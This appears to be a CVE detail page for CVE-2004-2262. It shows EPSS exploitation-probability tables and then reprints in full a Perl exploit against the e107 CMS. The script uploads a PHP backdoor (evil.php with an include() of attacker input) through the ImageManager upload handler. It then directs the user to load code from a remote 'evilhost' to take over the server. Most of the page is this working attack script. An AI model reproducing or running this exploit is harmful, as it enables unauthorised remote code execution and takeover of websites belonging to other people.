CVE-2004-2262 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	15.61%	–	–
2022-04-03	–	–	15.61%	–	–
2023-03-12	–	–	–	9.29%	–
2024-01-28	–	–	–	5.07%	–
2024-02-11	–	–	–	5.07%	–
2024-06-02	–	–	–	5.07%	–
2024-12-22	–	–	–	33.76%	–
2025-01-19	–	–	–	33.76%	–
2025-03-18	–	–	–	–	21.87%
2025-03-18	–	–	–	–	21.87,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	93%
2022-04-03	96%
2023-03-12	94%
2024-01-28	92%
2024-02-11	93%
2024-06-02	93%
2024-12-22	97%
2025-01-19	97%
2025-03-18	95%
2025-03-18	95%

#################################################################### # # _____ _ # | ___| | _____ ___ # | |_ | |/ _ \ \ /\ / / # | _| | | (_) \ V V / # |_| |_|\___/ \_/\_/ # Security Group. # # -=[ e107 remote sploit ]=- # by sysbug # # Attack method: # with this sploit u can send an include() vuln to a Host victim # the upload go to /images/evil.php # # C:\Perl\bin>perl sploit.pl www.site.com # -=[ e107 remote sploit ]=- # by sysbug # # www.site.com # # OWNED OH YEAH! # # get your evilc0de in: # # www.site.com/images/evil.php?owned=http://evilhost/ # C:\Perl\bin> # # credits: ALL MY FRIENDS! # HELP ? RTFM -> perl sploit.pl ##################################################################### use IO::Socket; if(@ARGV < 1){ usage(); exit; } main(); sub main(){ print "-=[ e107 remote sploit ]=-\n"; print " by sysbug \n\n"; $host[0] = $ARGV[0]; if($host[0] =~ /\//){ ($host[1],$host[2])=split(/\//,$host[0]); $host[0] =~ /\/(.*)/; $host[3] = "/"; $host[3] .= $1; } $host[1] = $host[0] if(!$host[1]); @handlers =("e107_handlers","handlers"); print "# $host[1]\n"; foreach $handler(@handlers){ $path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php"; $socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die " s0k off\n"; print $socket "POST $path HTTP/1.1\r\n"; print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php\r\n"; print $socket "Accept-Language: pt\r\n"; print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n"; print $socket "Accept-Encoding: gzip, deflate\r\n"; print $socket "User-Agent: l33t br0ws3r\r\n"; print $socket "Host: $host[1]\r\n"; print $socket "Content-Length: 1646\r\n"; print $socket "Connection: Keep-Alive\r\n\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n"; print $socket "/\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"width\"\r\n\r\n\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"vert\"\r\n\r\n\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"alt\"\r\n\r\n\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"height\"\r\n\r\n\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"horiz\"\r\n\r\n\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n"; print $socket "Content-Type: application/octet-stream\r\n\r\n"; print $socket "<? include(\$owned); ?>\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"align\"\r\n\r\n"; print $socket "baseline\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"border\"\r\n\r\n\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"orginal_width\"\r\n\r\n\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"orginal_height\"\r\n\r\n\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"constrain_prop\"\r\n\r\n"; print $socket "on\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n"; print $socket "Refresh\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n"; print $socket "OK\r\n"; print $socket "-----------------------------7d410e113f8\r\n"; print $socket "Content-Disposition: form-data; name=\"cancel\"\r\n\r\n"; print $socket "Cancel\r\n"; print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n"; @socket = <$socket>; foreach $teste(@socket){ if($teste=~ /<title>Image Browser<\/title>/){ print "# OWNED OH YEAH!\n"; print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n"; $result = 1; } } close($socket); } if($result){ exit; } print "# b4d upload!!"; } sub usage(){ print "-=[ e107 remote sploit ]=-\n"; print " by sysbug \n\n"; print "# usage: perl $0 <host> \n"; } # milw0rm.com [2004-12-22]